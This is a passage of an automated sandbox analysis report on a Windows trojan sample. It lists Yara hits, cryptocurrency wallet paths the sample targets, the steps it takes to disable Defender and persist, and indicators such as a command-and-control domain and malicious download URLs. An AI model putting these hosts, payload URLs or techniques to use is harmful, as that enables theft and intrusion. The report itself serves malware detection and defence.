      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: JeCXrQSehB.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPED
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \wallet.dat/\BitcoinCore\wallet.dat#\Electrum\wallets
      Source: JeCXrQSehB.exe, 00000006.00000002.572742280.000000000298C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: vJaXX
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \LitecoinCore\1\LitecoinCore\wallet.dat%\Ethereum\keystore
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \LitecoinCore\1\LitecoinCore\wallet.dat%\Ethereum\keystore
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \LitecoinCore\1\LitecoinCore\wallet.dat%\Ethereum\keystore
      Source: Yara matchFile source: JeCXrQSehB.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000003.254146038.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: JeCXrQSehB.exe PID: 3480, type: MEMORYSTR
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPED

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: JeCXrQSehB.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.6809a.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.65295.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.JeCXrQSehB.exe.40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPED
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      1
      Scheduled Task/Job
      11
      Process Injection
      11
      Disable or Modify Tools
      11
      Input Capture
      1
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts2
      Command and Scripting Interpreter
      Boot or Logon Initialization Scripts1
      Scheduled Task/Job
      1
      Obfuscated Files or Information
      LSASS Memory12
      System Information Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth1
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Scheduled Task/Job
      Logon Script (Windows)Logon Script (Windows)1
      Software Packing
      Security Account Manager11
      Security Software Discovery
      SMB/Windows Admin Shares11
      Input Capture
      Automated Exfiltration1
      Non-Standard Port
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Masquerading
      NTDS1
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer2
      Non-Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
      Virtualization/Sandbox Evasion
      LSA Secrets21
      Virtualization/Sandbox Evasion
      SSHKeyloggingData Transfer Size Limits112
      Application Layer Protocol
      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common11
      Process Injection
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Hidden Files and Directories
      DCSync1
      Remote System Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Hidden Users
      Proc Filesystem1
      System Network Configuration Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 723742 Sample: JeCXrQSehB.exe Startdate: 15/10/2022 Architecture: WINDOWS Score: 100 48 checkme12.freeddns.org 2->48 50 us-east-1.route-1.000webhost.awex.io 2->50 52 payloads-poison.000webhostapp.com 2->52 64 Snort IDS alert for network traffic 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for URL or domain 2->68 70 9 other signatures 2->70 9 JeCXrQSehB.exe 16 5 2->9         started        14 JeCXrQSehB.exe 2 2->14         started        signatures3 process4 dnsIp5 54 ip-api.com 208.95.112.1, 49697, 49700, 80 TUT-ASUS United States 9->54 42 C:\Users\user\AppData\Roaming\...\Client.exe, PE32 9->42 dropped 72 May check the online IP address of the machine 9->72 74 Uses schtasks.exe or at.exe to add and modify task schedules 9->74 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->76 78 Disables Windows Defender (via service or powershell) 9->78 16 Client.exe 14 4 9->16         started        20 powershell.exe 20 9->20         started        22 powershell.exe 11 9->22         started        24 13 other processes 9->24 file6 signatures7 process8 dnsIp9 44 checkme12.freeddns.org 37.0.14.217, 1604, 49701, 49702 WKD-ASIE Netherlands 16->44 46 ip-api.com 16->46 56 Antivirus detection for dropped file 16->56 58 Multi AV Scanner detection for dropped file 16->58 60 Protects its processes via BreakOnTermination flag 16->60 62 4 other signatures 16->62 26 schtasks.exe 1 16->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 24->34         started        36 conhost.exe 24->36         started        38 10 other processes 24->38 signatures10 process11 process12 40 conhost.exe 26->40         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      JeCXrQSehB.exe96%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      JeCXrQSehB.exe69%VirustotalBrowse
      JeCXrQSehB.exe100%AviraTR/ATRAPS.Gen
      JeCXrQSehB.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\UPX\Client.exe100%AviraTR/ATRAPS.Gen
      C:\Users\user\AppData\Roaming\UPX\Client.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\UPX\Client.exe96%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      SourceDetectionScannerLabelLinkDownload
      0.0.JeCXrQSehB.exe.40000.0.unpack100%AviraTR/ATRAPS.GenDownload File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://127.0.0.1:4040/api/tunnels0%Avira URL Cloudsafe
      http://91.134.207.164yk0%Avira URL Cloudsafe
      http://91.134.207.16/WinSCP.exe0%Avira URL Cloudsafe
      http://ip-api.com4yk0%Avira URL Cloudsafe
      http://91.134.207.160%Avira URL Cloudsafe
      http://91.134.207.16/WinSCP.com0%Avira URL Cloudsafe
      http://91.134.207.16/ngrok.exe0%Avira URL Cloudsafe
      http://91.134.207.16/autoupdate1.exe100%Avira URL Cloudmalware
      http://91.134.207.16/Install.exe100%Avira URL Cloudmalware
      http://91.134.207.16/getrdp.exe100%Avira URL Cloudmalware
      http://91.134.207.16/rdpinstall.exe100%Avira URL Cloudmalware
      http://us-east-1.route-1.000webhost.awex.io0%Avira URL Cloudsafe
      checkme12.freeddns.org0%Avira URL Cloudsafe
      http://91.134.207.16/update.exe100%Avira URL Cloudmalware
      http://91.134.207.16/autoupdate2.exe100%Avira URL Cloudmalware
      http://91.134.207.16/svchost.exe100%Avira URL Cloudmalware
      http://91.134.207.16/ngrok.exe=set0%Avira URL Cloudsafe
      https://payloads-poison.000webhostapp.com4yk0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      ip-api.com
      208.95.112.1
      truefalse
        high
        us-east-1.route-1.000webhost.awex.io
        145.14.145.92
        truefalse
          unknown
          checkme12.freeddns.org
          37.0.14.217
          truetrue
            unknown
            payloads-poison.000webhostapp.com
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              checkme12.freeddns.orgtrue
              • Avira URL Cloud: safe
              unknown
              http://ip-api.com/json/false
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://freegeoip.net/xml/JeCXrQSehB.exe, Client.exe.0.drfalse
                  high
